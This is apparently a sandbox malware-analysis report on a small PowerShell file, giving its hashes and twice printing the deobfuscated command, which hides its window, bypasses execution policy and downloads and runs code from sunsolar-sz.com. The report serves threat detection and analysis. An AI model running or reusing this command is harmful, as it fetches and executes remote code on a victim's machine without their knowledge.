Malicious
Malicious

46ef66c99de824e99f03e1cb91bdc3f7

PowerShell
MD5: 46ef66c99de824e99f03e1cb91bdc3f7
Size: 120 B
application/x-powershell
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
46ef66c99de824e99f03e1cb91bdc3f7
Sha1
64b88baddaf3e61505147cb6b3bfcd9dd56a0b84
Sha256
d122d98fbeacd544ebd3511d714cea1db5c0ba502073cd33f7dad80fa1c070c4
Sha384
d47d7a5373515de469199d60cb07129f7ad0ae2b7f177f74ebf46a73efde1b8dd55037c3d7da7bab747d1fdd95e1179c
Sha512
25003c764e61105b28f17f820ce4e47a07167f348814ac8743a2c29c6a614b433230e7a26f2f8238c653fba175f68c617f6bfb531e5346c0f8a466d738590835
SSDeep
3:VSJJFIGFGMFI1oM3KAJJFId1sqPJH0cVERvBuIFXLbEXlun:s8GFGMFI1R3Ks8zsO0cKtgVun
File Structure
46ef66c99de824e99f03e1cb91bdc3f7
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
Value
Deobfuscated PowerShell

Start-Process -WindowStyle "Hidden" "powershell" -Args "-ExecutionPolicy Bypass -c iex(irm sunsolar-sz.com)"

Deobfuscated PowerShell

-args "-ExecutionPolicy Bypass -c iex(irm sunsolar-sz.com)"

46ef66c99de824e99f03e1cb91bdc3f7 (120 B)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙